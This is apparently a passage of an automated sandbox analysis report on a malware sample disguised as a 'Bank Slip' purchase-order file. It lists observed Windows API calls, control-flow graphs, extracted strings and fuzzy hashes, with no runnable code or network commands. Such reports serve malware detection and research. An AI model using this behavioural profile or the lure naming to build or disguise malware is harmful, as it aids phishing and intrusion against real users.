94069->94072 94070 401bff 94070->94070 94075 42e0f3 94072->94075 94076 42e117 94075->94076 94087 4072d3 94076->94087 94078 42e140 94086 42e19c 94078->94086 94090 41ae93 94078->94090 94080 42e15f 94081 42e174 94080->94081 94105 42c803 94080->94105 94101 428113 94081->94101 94084 42e18e 94085 42c803 ExitProcess 94084->94085 94085->94086 94086->94070 94089 4072e0 94087->94089 94108 416283 94087->94108 94089->94078 94091 41aebf 94090->94091 94126 41ad83 94091->94126 94094 41af04 94096 41af20 94094->94096 94098 42c433 NtClose 94094->94098 94095 41aeec 94099 41aef7 94095->94099 94132 42c433 94095->94132 94096->94080 94100 41af16 94098->94100 94099->94080 94100->94080 94102 428175 94101->94102 94104 428182 94102->94104 94140 4183d3 94102->94140 94104->94084 94106 42c81d 94105->94106 94107 42c82e ExitProcess 94106->94107 94107->94081 94109 4162a0 94108->94109 94111 4162b9 94109->94111 94112 42cec3 94109->94112 94111->94089 94114 42cedd 94112->94114 94113 42cf0c 94113->94111 94114->94113 94119 42ba93 94114->94119 94117 42e573 RtlFreeHeap 94118 42cf85 94117->94118 94118->94111 94120 42bab0 94119->94120 94123 17d2c0a 94120->94123 94121 42badc 94121->94117 94124 17d2c1f LdrInitializeThunk 94123->94124 94125 17d2c11 94123->94125 94124->94121 94125->94121 94127 41ad9d 94126->94127 94131 41ae79 94126->94131 94135 42bb33 94127->94135 94130 42c433 NtClose 94130->94131 94131->94094 94131->94095 94133 42c44d 94132->94133 94134 42c45e NtClose 94133->94134 94134->94099 94136 42bb4d 94135->94136 94139 17d35c0 LdrInitializeThunk 94136->94139 94137 41ae6d 94137->94130 94139->94137 94141 4183fd 94140->94141 94147 41890b 94141->94147 94148 413a93 94141->94148 94143 41852a 94144 42e573 RtlFreeHeap 94143->94144 94143->94147 94145 418542 94144->94145 94146 42c803 ExitProcess 94145->94146 94145->94147 94146->94147 94147->94104 94152 413ab3 94148->94152 94150 413b1c 94150->94143 94151 413b12 94151->94143 94152->94150 94153 41b1a3 RtlFreeHeap LdrInitializeThunk 94152->94153 94153->94151 94154 418b28 94155 42c433 NtClose 94154->94155 94156 418b32 94155->94156 94217 17d2b60 LdrInitializeThunk

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 177 417563-41757f 178 417587-41758c 177->178 179 417582 call 42f153 177->179 180 417592-4175a0 call 42f753 178->180 181 41758e-417591 178->181 179->178 184 4175b0-4175c1 call 42dbc3 180->184 185 4175a2-4175ad call 42f9f3 180->185 190 4175c3-4175d7 LdrLoadDll 184->190 191 4175da-4175dd 184->191 185->184 190->191
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                                                                                                        • Instruction ID: bdce513adcdf66a5ddf40d0a2ecde4d7099c94072a20f6ffb4ae009ad51faa44
                                                                                                        • Opcode Fuzzy Hash: cabadc429ca9bf0ea4f6f112ad196f5047ef34b7e91932448bc3641e5bf786ad
                                                                                                        • Instruction Fuzzy Hash: B00171B1E0020DBBDF10DBE1DC42FDEB379AB54308F4081AAE90897241F634EB588B95

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 219 42c433-42c46c call 404713 call 42d6b3 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C467
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction ID: 37a102a096cf0697ac499042812ebe3be0a6e3a94df1b2a833282852239f11ec
                                                                                                        • Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction Fuzzy Hash: 7DE04F766002147BD620BA5AEC41F97775CDFC5714F00801AFA0867282C675791087F5
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                                                                                        • Instruction ID: cfb84d624313eadea449f7af612ad7d1e430112c05f136dccf16f7d06bc42ec3
                                                                                                        • Opcode Fuzzy Hash: 5a0df2086f0a64429751f919be9538894ccab8346bf79a55270c0da338c8f5f0
                                                                                                        • Instruction Fuzzy Hash: 1990026120640003420571584418616808A97E4201B55C031E10145A0DC5258A916226
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                                                                                        • Instruction ID: 73c6f7c825fda3dcc9f0a932bc53ca62dd8125dc3e94d0048e0ae64d0ee70065
                                                                                                        • Opcode Fuzzy Hash: 5789bbc654ff4568ac711eead2ac9183e1cfcec799800157916e92f139ccd146
                                                                                                        • Instruction Fuzzy Hash: FC90023120540413D21171584508707408997D4241F95C422A0424568DD6568B52A222
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                                                                                        • Instruction ID: 85804f4409594ef709451d78ba5fdb81f9cc398358337d6c7682427610d4a138
                                                                                                        • Opcode Fuzzy Hash: 7f656be150585fb9ab6d531a5c02b43d6f57bcb397046b123a75e2ada1d4cb04
                                                                                                        • Instruction Fuzzy Hash: 0D90023120548802D2107158840874A408597D4301F59C421A4424668DC6958A917222
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                                                                                        • Instruction ID: f3bf2810e9835c5e9833fea3ed9fbbc400c90e70eb677d4a5a61e155de262d52
                                                                                                        • Opcode Fuzzy Hash: c89928f37792d48a4984047122f5992905791b7031c0ee117359313a12cbc9d9
                                                                                                        • Instruction Fuzzy Hash: 9890023160950402D20071584518706508597D4201F65C421A0424578DC7958B5166A3

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 413d7a-413d89 1 413df9-413e04 0->1 2 413d8b-413da4 0->2 3 413e06-413e0b 1->3 4 413e6e-413e73 1->4 5 413d43-413d65 2->5 6 413da6-413db1 2->6 7 413e0c-413e0e 3->7 8 413e75-413e7d 4->8 9 413edb 4->9 10 413d67-413d78 5->10 11 413d1d 5->11 12 413db3 6->12 13 413dcd-413dec 6->13 15 413e9d-413ea3 8->15 16 413e7f-413e8e PostThreadMessageW 8->16 17 413ee9-413eec 9->17 18 413edd-413ee3 9->18 11->5 12->13 23 413df0-413df8 13->23 24 413dee 13->24 16->15 20 413e90-413e9a 16->20 21 413ee5-413ee8 18->21 22 413ebb-413ebf 18->22 20->15 22->18 25 413ec1-413ec6 22->25 23->1 24->7 24->23 25->18 26 413ec8-413ecd 25->26 26->18 27 413ecf-413ed6 26->27 27->17 29 413ed8 27->29 29->9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Ea64OHKq$Ea64OHKq
                                                                                                        • API String ID: 0-1999359540
                                                                                                        • Opcode ID: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
                                                                                                        • Instruction ID: 41e09621a5d42bbcee0aa685c486dca4cf25d64e691113f71131abf1b070321e
                                                                                                        • Opcode Fuzzy Hash: 2170b2706495e477f36690baaeab8e2ed5ef455a2e5be8fe8db28eff5c99c4a6
                                                                                                        • Instruction Fuzzy Hash: BE310F336043019FC710CE68ACC69EAB769EF85B1570445ABE144CF3A2E2298F83C788

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: Ea64OHKq$Ea64OHKq
                                                                                                        • API String ID: 1836367815-1999359540
                                                                                                        • Opcode ID: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
                                                                                                        • Instruction ID: 62f55432ef48320368bfc7655e925e1af4bb88519bc3667248631d0393ebb683
                                                                                                        • Opcode Fuzzy Hash: f728d0fd1d093d495b9d187a71c219eeef39321d16eda19571346ca1d6f1b2e0
                                                                                                        • Instruction Fuzzy Hash: 5C012671D0021C7AEB11ABE58C82DEF7B7CDF413A8F048169FA14AB241D67D4E068BB1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 44 413e13-413e25 45 413e2d-413e7d call 42f023 call 417563 call 404683 call 424c83 44->45 46 413e28 call 42e613 44->46 55 413e9d-413ea3 45->55 56 413e7f-413e8e PostThreadMessageW 45->56 46->45 56->55 57 413e90-413e9a 56->57 57->55
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(Ea64OHKq,00000111,00000000,00000000), ref: 00413E8A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: Ea64OHKq$Ea64OHKq
                                                                                                        • API String ID: 1836367815-1999359540
                                                                                                        • Opcode ID: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
                                                                                                        • Instruction ID: 832b8f0f82de43865680b143cd41517b910a90eb7c2e8913e91f4129158ae345
                                                                                                        • Opcode Fuzzy Hash: 6ed66bee4afdd21d6ca14d40a52513aa6258b5fe58fa69909035cbd9116e2f25
                                                                                                        • Instruction Fuzzy Hash: 10012671D0021C7AEB11AAE18C81DEF7B7CDF40398F048029FA0467241D57D4E058BB5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 193 41760f-417610 194 417612-417623 193->194 195 41759b-4175a0 193->195 196 4175b0-4175c1 call 42dbc3 195->196 197 4175a2-4175ad call 42f9f3 195->197 202 4175c3-4175d0 196->202 203 4175da-4175dd 196->203 197->196 204 4175d1-4175d7 LdrLoadDll 202->204 204->203
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                                                                                                        • Instruction ID: 244a9be35222bc483ccb875c85ee509224bce84f5c57bb6526cc21583e77dac4
                                                                                                        • Opcode Fuzzy Hash: 423c684e834905f389e317ff0e0b23f2fa40fc56bd2a3155af97fab3e49be924
                                                                                                        • Instruction Fuzzy Hash: 81F062B1E04109BADF10DBA0DC91FDEB775AF14705F444266E80497641F635E7888795

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 205 417624-417632 206 4175d1-4175d7 LdrLoadDll 205->206 207 417634-417671 205->207 208 4175da-4175dd 206->208
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                                                                                                        • Instruction ID: 3da201fd3e5f4a38d3ab40cb9ffbd160d6eadf765e117ee62af733f6e3875303
                                                                                                        • Opcode Fuzzy Hash: b7da9ea4713e95006062604f2f78b917355cdf7c45eb40070df55e5d5004b345
                                                                                                        • Instruction Fuzzy Hash: BDF09E39699B086BC3118BB998057C9B7E4FF42900F294198DDC9C6E53E363821AC781

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 209 42c763-42c7a7 call 404713 call 42d6b3 RtlAllocateHeap
                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,0041E354,?,?,00000000,?,0041E354,?,?,?), ref: 0042C7A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction ID: 8478ad7e8697ef7acc63e2c8c0b0e70c508952faf178b19bb78cdc86ac20e0b7
                                                                                                        • Opcode Fuzzy Hash: 8e8f804e6e2566f97d4133197ec8a822201c655ac3a2fa4d2fbee59e578fcff7
                                                                                                        • Instruction Fuzzy Hash: 18E06DB27042047FD610EE59EC45F9B73ACEFC5714F004019F908A7282D770B9108AB5

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 214 42c7b3-42c7f4 call 404713 call 42d6b3 RtlFreeHeap
                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,9403D333,00000007,00000000,00000004,00000000,00416E48,000000F4), ref: 0042C7EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3298025750-0
                                                                                                        • Opcode ID: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                                                                                                        • Instruction ID: 0103aceadb78e79b7ecc8faacede7f1e09fa23b9d57152ecbc1c1368217fcbeb
                                                                                                        • Opcode Fuzzy Hash: 27bbdd54da5c965e61241d10b6020c612638fb223b0637cadf89fda0c63e04a5
                                                                                                        • Instruction Fuzzy Hash: 6DE06DB17002047BD610EE59EC81F9B33ADDFC5710F004019FE08A7241D671B9108AB9

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 224 42c803-42c83c call 404713 call 42d6b3 ExitProcess
                                                                                                        APIs
                                                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,355104C2,?,?,355104C2), ref: 0042C837
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1973556166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 621844428-0
                                                                                                        • Opcode ID: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
                                                                                                        • Instruction ID: f8c1995de4c57a0dc7d95be7e0574ee260bed641c46f1d5501e4473e89b5d8ab
                                                                                                        • Opcode Fuzzy Hash: cef4f983fc9ebd551220bca8743f3b8b02da57f9f425297ef17eed880e4366f5
                                                                                                        • Instruction Fuzzy Hash: F9E04F756442147FD120BA9ADC41F97776CDFC5714F40401AFA1C67241C674790487F4

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 229 17d2c0a-17d2c0f 230 17d2c1f-17d2c26 LdrInitializeThunk 229->230 231 17d2c11-17d2c18 229->231
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 2f6c5b22767bc1e4ea76ef666367e96e45b76eb5b30d8c3feaab3835d59e5659
                                                                                                        • Instruction ID: ede3efcb15847821485b96005da32eac148b59a4bc1864e67c9726b6bfeae819
                                                                                                        • Opcode Fuzzy Hash: 2f6c5b22767bc1e4ea76ef666367e96e45b76eb5b30d8c3feaab3835d59e5659
                                                                                                        • Instruction Fuzzy Hash: 96B09B719055C5C5DB12E764460C717B95077D0701F15C071D2070651F4738C5D1E276
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                        • API String ID: 0-2160512332
                                                                                                        • Opcode ID: 139fd6781def6effa5878b9cdf1d57d469c7dd31bbf5c9190f181c589b0d522f
                                                                                                        • Instruction ID: e1bacf8b38a67820d74518e9bdd64869a482602da5ce951131a96da8e5f2e9e0
                                                                                                        • Opcode Fuzzy Hash: 139fd6781def6effa5878b9cdf1d57d469c7dd31bbf5c9190f181c589b0d522f
                                                                                                        • Instruction Fuzzy Hash: C592D072604346AFE721CF28C884F6BB7EABB84714F14482DFA94D7255D770EA44CB92
                                                                                                        Strings
                                                                                                        • Critical section address., xrefs: 01805502
                                                                                                        • Thread identifier, xrefs: 0180553A
                                                                                                        • corrupted critical section, xrefs: 018054C2
                                                                                                        • Address of the debug info found in the active list., xrefs: 018054AE, 018054FA
                                                                                                        • undeleted critical section in freed memory, xrefs: 0180542B
                                                                                                        • Invalid debug info address of this critical section, xrefs: 018054B6
                                                                                                        • Critical section address, xrefs: 01805425, 018054BC, 01805534
                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0180540A, 01805496, 01805519
                                                                                                        • double initialized or corrupted critical section, xrefs: 01805508
                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054CE
                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018054E2
                                                                                                        • 8, xrefs: 018052E3
                                                                                                        • Critical section debug info address, xrefs: 0180541F, 0180552E
                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 01805543
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                        • API String ID: 0-2368682639
                                                                                                        • Opcode ID: 67f8446bee1063cd66766666686bb34d9f72d4b729d5bd0adf8dfdab28a7766b
                                                                                                        • Instruction ID: ef3423f94379bdaf2f1f76e6ee547046fc4633622babf4b217fe43e670514bc0
                                                                                                        • Opcode Fuzzy Hash: 67f8446bee1063cd66766666686bb34d9f72d4b729d5bd0adf8dfdab28a7766b
                                                                                                        • Instruction Fuzzy Hash: B68169B1A40348EEDB61CF99C859BAEFBB5AB08B14F204119F504F7281D3B5AA41CF61
                                                                                                        Strings
                                                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0180261F
                                                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018022E4
                                                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01802506
                                                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018024C0
                                                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01802409
                                                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01802624
                                                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01802498
                                                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01802602
                                                                                                        • @, xrefs: 0180259B
                                                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01802412
                                                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018025EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                        • API String ID: 0-4009184096
                                                                                                        • Opcode ID: 35c7cd39b25cbabbd6ec771a890c6446d837c6cf0b7d98b46b18c50bef611670
                                                                                                        • Instruction ID: 186d12e938e221332168dfc9fe5f307cae00737989f2ef05726712511ba0c0fc
                                                                                                        • Opcode Fuzzy Hash: 35c7cd39b25cbabbd6ec771a890c6446d837c6cf0b7d98b46b18c50bef611670
                                                                                                        • Instruction Fuzzy Hash: F8025DF1D002299BDB71DB54CC84BDAF7B8AB54704F4141EEA609A7282EB709F84CF59
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                        • API String ID: 0-2515994595
                                                                                                        • Opcode ID: b079cff3acc3a8fd54cbfb578bc70ef18e5852782a1decbe2b2a23e24beb0626
                                                                                                        • Instruction ID: 422203e4046b946a600ce342c8bb81e0667865277815485523e3defee7772c1c
                                                                                                        • Opcode Fuzzy Hash: b079cff3acc3a8fd54cbfb578bc70ef18e5852782a1decbe2b2a23e24beb0626
                                                                                                        • Instruction Fuzzy Hash: 8451EF711183069BC329CF188848BABBBECEFD5344F180A2DB999C3245E770D609CBD2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                        • API String ID: 0-1700792311
                                                                                                        • Opcode ID: 691e278bbfbe6277a2bd790e2bcb3a60b00ffb0beb69321b373ce6dbdd1586c6
